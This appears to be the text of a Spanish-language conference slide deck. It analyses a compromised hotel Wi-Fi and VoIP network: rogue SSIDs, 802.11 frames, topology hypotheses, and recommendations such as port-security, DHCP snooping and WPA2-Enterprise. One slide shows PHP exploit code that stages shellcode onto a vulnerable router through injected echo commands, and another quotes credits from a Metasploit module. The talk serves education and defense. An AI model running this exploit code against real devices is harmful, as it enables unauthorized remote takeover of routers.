La red del hotel ha sido comprometida! Los usuarios del hotel están siendo atraídos por access points infectados, los puertos de sus dispositivos siendo escaneados, las comunicaciones intervenidas y por las lineas telefónicas IP las interferencias no son un buen augurio. Alguien debe hacer algo al respecto
2. Disclaimer
●
La ponencia que estas a punto de presenciar en carácter técnico y educativo.
●
Esta presentacion y su contenido fueron realizados con intenciones
educativas basandose en un incidente de seguridad documentado con
autorización de las partes potencialmente afectadas.
●
He preferido mantener en anonimidad la entidad afectada por lo que los
nombres mencionados (si aplica) no deben ser tomados como reales.
● No me hago responsable del uso malintencionado que se le pueda dar a la
informacion brindada.
●
Ninguno de mis clientes o empleadores tienen conocimiento específico ni
colaboraron, de manera directa o indirecta, con la investigación ni el analisis
que será presentado.
Enjoy the ride :)
3. ¿De qué va esta exposición?
● Contexto
● Monitorización de un ataque potencial.
● Especulaciones varias.
● Reconocimiento y encapsulación del espectro de ataque.
● Medidas contraofensivas.
● Especulación e hipótesis sobre el esquema de red.
● Topologias de escenario posibles.
● Reflexiones varias.
● Contramedidas preventivas.
13. ¿?
● 2 SSID's “HOJO” y 1 SSID “Cisco42618”
● “Fake” HOJO y Cisco42618 comparten segmento LAN 192.168.1.0 /24 El otro HOJO
entrega 192.168.103.0 /24
● Sobre los dos que comparten IP publica (Y) recibo el mismo escaneo del puertos...
● “Gateway” LAN (192.168.1.1) sniffeando puertos ...
● Mac address TPLink ?!?!
14.
15. Tramas IEEE 801.11
Estructura
Encabezado MAC : Frame control, version de protocolo, tipo
de trama, BSSID, Origen y Desitino (30 Bytes)
Payload: Data o posible información contenida en las tramas
de management (0 – 2312 Bytes)
FCS: Frame Check Sequence. Verifica la integridad. Cierra la
trama con un calculo de redundancia cliclica cuyo resultado
debe ser de la suma del encabezado MAC y el Payload (4
Bytes)
Tipos Control Frame: Permite el intercambio de infomacion. RTS,
CTS, ACK. Permite una mejor coordinacion entre el uso
compartido y el espectro disponible
Data: Payload, contiene los paquetes TCP o UDP. Como el
limite es de 2312 posiblemente sean fragmentados.
Management: Permiten encontrar otros AP y proveen la
posibilidad de conectarte y desconectarte de un punto de acceso
Management Frames.
Beacons
Probes
Association
Authentication
26. - Declaracion del encargado de no pertenencia del dispositivo: Check
- Verificacion de uso mal intencionado del standard IEEE 802.11g,n: Check
- Falta de dinero para salir de bares esa noche: Check
27.
28.
29.
30.
31.
32.
33. 'Author' =>
[
'Johannes Ullrich', #worm discovery
'Rew', # original exploit
'infodox', # another exploit
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit
module
'juan vazquez' # minor help with msf module
36. // Si se usa wget se necesitaria que el payload sea accesible por el puerto 80 en la
maquina del atacante. La mejor solución es escribir manualmente el ejecutable con
"echo -en", pero httpd crashea con strings largos, asi que lo vamos a usar igual pero
hay que armarlo por partes :)
// en caso que hayamos tenido una falla previa de ejecucion.
$cleanup = build_packet($host, $port, $vuln, "rm /tmp/c0d3z");
if(!send_packet($host, $port, $cleanup)) die("failn");
else echo "listortin";
//Escribimos el payload en stages de 20 bytes
for($i=0; $i<strlen($shellcode); $i+=20) {
echo "tSending ".$i."/".strlen($shellcode)." bytes... ";
$cmd = "echo -en '";
for($c=$i; $c<$i+20 && $c<strlen($shellcode); $c++) {
$cmd .= "0".decoct(ord($shellcode[$c]));
}
$cmd .= "' >> /tmp/c0d3z";
$cmd = build_packet($host, $port, $vuln, $cmd);
if(!send_packet($host, $port, $cmd)) die("failn");
else echo "sent!n";
usleep(100000);
}
76. ● Los telefonos no se ven en las capturas por lo que deberian
haber estado en otra vlan.
● El switch tiene como gateway el router Cisco “sospechoso” por
lo que, si era propiedad del hotel, pudo ser manipulado post
explotacion o deliberadamente propiedad del/los atacante/s.
---
● El router Cisco es propiedad del atacante.
● Las bocas telefonicas proveen direcciones dentro del pool
192.168.1.0/24 por lo que tanto el dispositivo atacante como el
switch y el servidor de telefonia tienen que compartir Vlan de
gestion. LA NATIVA! Lo cual les da acceso a la red de gestion
del servidor de telefonía.
● El tema ahora es: El switch en la frontera del servidor contra la
patchera hacia los telefonos no se ve en las capturas, por lo que
debe forwardear la vlan nativa y no tener IP de administracion
en la misma sino en otra vlan.
82. ●
Un Portal Cautivo no es un método que provea un mecanismo de seguridad para el usuario
aunque “prevenga” el acceso web. La autenticación ya fué realizada sin cifrado previo.
●
La Vlan nativa no tiene que ser propagada por los troncales y mucho menos contener el
segmento de administración de equipos de infraestructura de red.
●
Se deben considerar en ambientes expuestos políticas de cantidad de mac addresses por
puerto (port-security), dhcp snooping y ARP Inspection.
●
Los individuos/companías que consideren que su información es valiosa tienen que optar por
métodos de cifrado y autenticación robustos. WPA/WPA2 en casos particulares con
contraseñas fuertes y el ideal WPA/WPA2 Enterprise con 802.1X y un servidor Radius y AD
seguros son una buen arranque perimetral.
●
Vlan Profiling, IDS, IPS y/o NAC para reforzar los accesos. El BYOD ya llegó :)
●
Los equipos de distribución y acceso deben contar con contraseñas robustas y nunca las que
vienen por defecto. Reforzar los accesos con certificados y llaves RSA.
●
Buena politica de ACL's inter-VLAN.
●
Los equipos de comunicaciones deben ser renovados y actualizados a nivel de versión o
configuración si se considera que pueden estar expuestos a una vulnerabilidad publicada.
●
No hay que realizar ataques mal intencionados. Y si existe algo peor que eso es hacerlo con
herramientas vulnerables.
83. ● Mantener el software del dispositivo/computadora y antivirus
actualizado.
● Prestar atención a alertas de sitios maliciosos y errores de
certificado. Navegar con conciencia :)
● Desactivar la conexion automática a redes conocidas. No
conozco los pasos de todos los telefonos. Googleen! :D
● Identificar patrones de ataque: Muchas redes cercanas con
autenticación abierta, sitios web sin HTTPS.
84. ● Googlear el modelo de tu router acerca de posibles
vulnerabilidades remotas o locales y configurar
adecuadamente, actualizar o renovar el equipo.
● Bloquear el acceso remoto a la gestion web.
85. Y por ultimo
● Utilizar siempre WPA o WPA2 con contraseñas complejas
(números, mayúsculas, minúsculas, simbolos). Evitar
involucrar numeros de documento, telefono, libreta, pasaporte,
patente del auto, fechas de nacimiento. En muchos casos esta
información ya es de dominio público. Esto solo evita el ataque
por fuerza bruta.
● Utilizar el criterio con los correos electrónicos y elementos
compartidos en redes sociales de gente que no es de
confianza (y de confianza tambien!).